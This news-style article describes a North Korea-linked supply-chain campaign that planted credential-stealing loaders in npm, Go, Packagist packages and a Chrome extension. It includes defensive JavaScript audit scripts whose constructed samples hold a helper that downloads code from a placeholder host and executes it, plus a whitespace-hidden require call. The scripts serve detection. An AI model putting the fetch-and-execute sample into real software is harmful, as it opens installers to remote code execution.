North Korea’s Stealthy Code Attack Hits npm and Beyond

Imagine an invisible army sneaking into the tools developers rely on every day. That’s exactly what’s happening right now. North Korean hackers launched a sophisticated campaign that hijacks open-source software packages to steal the keys to digital kingdoms.
Six npm Packages, One Hidden Threat
Security researchers uncovered six malicious npm packages crafted to steal developer secrets. These packages don’t just deliver malware directly—they use layered delivery chains that slip past detection. The first stage looks innocent, installing hidden dependencies disguised as simple SVG utilities. But beneath the surface, they fetch secret payloads from a remote JSON source.
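The two install-time tricks described above, an automatic lifecycle hook and a helper that pulls code from a remote JSON document, both leave static traces that a reviewer can check before a dependency is installed. The script below is an added example written for this page, not code from the article or from any package it names; the package name, the host `config.example.invalid` and the helper file are constructed placeholders, and the checks run on in-memory strings so nothing is fetched.

```javascript
// Added example (not from the article or any named project): static checks for
// an npm install lifecycle hook and for install-time code that reaches the
// network or evaluates what it downloads. All inputs are constructed strings.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Report every lifecycle script in a package.json. Each of these hooks runs
// automatically during `npm install`, so any command listed here deserves review.
function auditManifest(packageJsonText) {
  const manifest = JSON.parse(packageJsonText);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] === "string") {
      findings.push({ kind: "lifecycle-hook", hook, command: scripts[hook] });
    }
  }
  return findings;
}

// Patterns that show a file talking to the network, spawning processes, or
// evaluating text at runtime. A utility that claims to only transform SVG has
// no reason to do any of these during installation.
const SUSPICIOUS_PATTERNS = [
  { name: "fetch", re: /\bfetch\s*\(/ },
  { name: "http(s).get/request", re: /\bhttps?\.(get|request)\s*\(/ },
  { name: "child_process", re: /require\(\s*["']child_process["']\s*\)/ },
  { name: "eval/Function", re: /\b(eval|new\s+Function)\s*\(/ },
];

// Scan a source file line by line and return every pattern hit with its line number.
function findRemoteFetches(sourceText) {
  const findings = [];
  sourceText.split("\n").forEach((line, idx) => {
    for (const { name, re } of SUSPICIOUS_PATTERNS) {
      if (re.test(line)) findings.push({ kind: name, line: idx + 1, text: line.trim() });
    }
  });
  return findings;
}

// Constructed sample: a manifest whose postinstall runs a helper, and a helper
// that downloads a JSON document from a placeholder host and runs a field of it.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "svg-helper-example", // constructed name, not a real package
  version: "1.0.0",
  scripts: { postinstall: "node setup.js" },
});

const SAMPLE_SETUP_JS = [
  'const https = require("https");',
  "// placeholder host; the article gives no real URL",
  'https.get("https://config.example.invalid/payload.json", (res) => {',
  '  let body = "";',
  '  res.on("data", (c) => (body += c));',
  '  res.on("end", () => new Function(JSON.parse(body).code)());',
  "});",
].join("\n");

// Run both checks over the constructed sample and return the combined report.
function auditSample() {
  return {
    manifest: auditManifest(SAMPLE_PACKAGE_JSON),
    source: findRemoteFetches(SAMPLE_SETUP_JS),
  };
}

console.log(JSON.stringify(auditSample(), null, 2));
```

On the sample the manifest check reports the `postinstall` hook, and the source check reports both the `https.get` call and the `new Function` evaluation on the downloaded body. In practice these checks are a triage aid, not proof of compromise: plenty of legitimate packages have a `prepare` script, so the useful signal is a lifecycle hook combined with network or evaluation calls in the file it launches, and the real confirmation is reading that file.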
Once activated, these payloads unleash a powerful toolkit. The malware steals credentials tied to AWS, Microsoft Azure, Google Gemini, and Anthropic Claude. It snatches SSH keys and even targets cryptocurrency wallets. Clipboard contents vanish, browser data disappears, and files get harvested—all without raising alarms.
Beyond npm: The Attack Spreads
This isn’t an isolated npm incident. The campaign has infected 108 open-source packages scattered across multiple ecosystems. Researchers identified 162 malicious release artifacts, including 80 Go modules, 10 Packagist packages, and even a Chrome extension. The attackers hijack legitimate maintainer accounts to slip malware into trusted repositories.
They manipulate Git histories with force pushes and antedated (backdated) commits. This trick hides malicious code changes from casual inspection, because the injected commit appears to be old and already reviewed. Obfuscated JavaScript loaders hide in plain sight—camouflaged inside whitespace padding or fake font files. Visual Studio Code task files become secret launchpads, silently executing harmful code the moment a developer opens a project.
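Each of the three repository-level tricks in this paragraph can be checked mechanically on a checkout. The script below is an added example written for this page, not code from the article or from any repository it names: it looks for VS Code tasks configured to run on folder open (the real `runOptions.runOn: "folderOpen"` setting in `tasks.json`), for source lines where code continues after a long run of whitespace, and for commits whose timestamps run backwards relative to their parent or whose author date lags far behind the committer date. The task labels, source lines, commit hashes and timestamps are constructed placeholders, and the git history is supplied as text in the format `git log --format='%H|%P|%at|%ct'` would print.

```javascript
// Added example (not from the article or any named project): three static
// checks for the repository tricks described above. All inputs are constructed.

// 1. VS Code tasks that start when the folder is opened. A task whose
//    runOptions.runOn is "folderOpen" launches without the developer invoking it.
function findFolderOpenTasks(tasksJsonText) {
  const doc = JSON.parse(tasksJsonText);
  return (doc.tasks || [])
    .filter((t) => t.runOptions && t.runOptions.runOn === "folderOpen")
    .map((t) => ({ label: t.label, command: t.command }));
}

// 2. Code hidden behind whitespace padding: a line that looks complete but
//    continues far to the right after at least `minPadding` spaces or tabs.
function findPaddedLines(sourceText, minPadding = 80) {
  const re = new RegExp(`\\S[ \\t]{${minPadding},}\\S`);
  const hits = [];
  sourceText.split("\n").forEach((line, idx) => {
    const m = re.exec(line);
    // hiddenFrom is the column of the first character after the padding
    if (m) hits.push({ line: idx + 1, hiddenFrom: m.index + m[0].length - 1 });
  });
  return hits;
}

// 3. Antedated commits. Input lines are `hash|parents|authorTime|commitTime`
//    (Unix seconds, parents space-separated). A commit dated earlier than its
//    parent, or with committer time far beyond author time, was not simply
//    appended to history and should be read, not skimmed.
function findAntiDatedCommits(logText, maxLagSeconds = 30 * 24 * 3600) {
  const byHash = new Map();
  for (const line of logText.trim().split("\n")) {
    const [hash, parents, at, ct] = line.split("|");
    byHash.set(hash, { hash, parents: parents ? parents.split(" ") : [], at: +at, ct: +ct });
  }
  const flagged = [];
  for (const c of byHash.values()) {
    const reasons = [];
    if (c.ct - c.at > maxLagSeconds) reasons.push("author date far behind commit date");
    for (const p of c.parents) {
      const parent = byHash.get(p);
      if (parent && c.ct < parent.ct) reasons.push("dated before its parent");
    }
    if (reasons.length) flagged.push({ hash: c.hash, reasons });
  }
  return flagged;
}

// Constructed sample inputs.
const SAMPLE_TASKS_JSON = JSON.stringify({
  version: "2.0.0",
  tasks: [
    { label: "build", type: "shell", command: "npm run build" },
    { label: "prep", type: "shell", command: "node .vscode/prep.js", // constructed
      runOptions: { runOn: "folderOpen" } },
  ],
});

const SAMPLE_SOURCE = [
  'module.exports = { version: "1.0.0" };',
  "const ok = true;" + " ".repeat(200) + 'require("./hidden")();', // constructed
].join("\n");

const SAMPLE_LOG = [
  "c3|c2|1700000000|1700000000",
  "c2|c1|1690000000|1690000000",
  "c1||1680000000|1680000000",
  "c4|c3|1650000000|1650000000", // child of c3 but dated earlier than c3
  "c5|c4|1600000000|1705000000", // author date ~3.3 years behind committer date
].join("\n");

console.log(findFolderOpenTasks(SAMPLE_TASKS_JSON));
console.log(findPaddedLines(SAMPLE_SOURCE));
console.log(findAntiDatedCommits(SAMPLE_LOG));
```

On the sample the task check reports `prep`, the padding check reports line 2 with the hidden call starting at column 216, and the commit check flags `c4` (dated before its parent) and `c5` (author date far behind committer date). The timestamp heuristics produce noise on honest rebases and cherry-picks, which also preserve old author dates, so treat them as a prompt to read the diff; the definitive signal for history rewriting is the force push itself, which the hosting platform records and a local reflog preserves, and branch protection that forbids force pushes removes the trick entirely.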
Using Web3 and Blockchain to Stay Hidden
The initial malware stage is a crafty JavaScript loader that taps into blockchain infrastructure on TRON, BNB Smart Chain, and Aptos. It pulls encrypted payloads directly from decentralized networks. This Web3 approach bypasses traditional filtering and blacklists, making the attack nearly invisible to defense tools.
The secondary payloads, known as OmniStealer and DEV#POPPER, give attackers full control. They can steal credentials, execute commands remotely, and siphon crypto wallets. Attackers also aim for high-value targets like Kubernetes tokens to move laterally inside organizations. The scope and stealth of the campaign make it a nightmare for defenders.
Who’s Behind the Campaign?
Evidence points to North Korean threat actors tied to groups called Contagious Interview and Famous Chollima. These groups have been linked to similar attacks since 2018. In April 2026, a massive Lazarus npm operation published 108 malicious packages across 261 versions, delivering malware families aligned with these clusters.
One GitHub account named Xpos587 was used to update multiple projects at once, showing how attackers seize control of trusted maintainers. An organization called 7span manages some of the compromised repositories. This campaign has grown larger than previously reported, spreading across npm, Packagist, Go modules, and Chrome extensions.
Why This Matters to Developers
Developers trust open-source tools to build software safely. This campaign exploits that trust by slipping dangerous code into everyday dependencies. The stolen credentials can give attackers access to cloud infrastructure, wallets, and sensitive developer environments.
Hidden in legitimate-looking files, the malicious code is nearly impossible to detect without expert analysis. The layered design, use of decentralized Web3 networks, and stealthy repository manipulation show a new level of sophistication. Developers and organizations must stay alert and audit dependencies carefully.
Looking Ahead
This attack signals a new era of supply chain threats. Cybercriminals are targeting the very tools developers rely on, turning open-source ecosystems into battlegrounds. The use of blockchain infrastructure to evade detection adds a dangerous twist. Will defenders keep up?
As this campaign expands, the cybersecurity community faces a critical challenge. Developers, maintainers, and security teams must join forces to defend the supply chain. Vigilance, transparency, and advanced detection tools will be key to stopping the next wave of malicious code hiding in plain sight.
Based on
- North Korea-linked npm packages impersonate Rollup polyfill tools to steal developer secrets — thenextweb.com
- North Korea-Linked PolinRider Campaign Hits 108 Open Source Packages and Extensions — cyberpress.org
- North Korea-Linked Hackers Hide JavaScript Loaders in Open Source Repositories — cybersecuritynews.com
- PolinRider supply chain attack expands to Packagist ecosystem — developer-tech.com
- Axios npm Hack: How North Korean Hackers Hijacked a Maintainer Account Using Fake Teams Error Fix (2026) — theemailmarketingguy.com
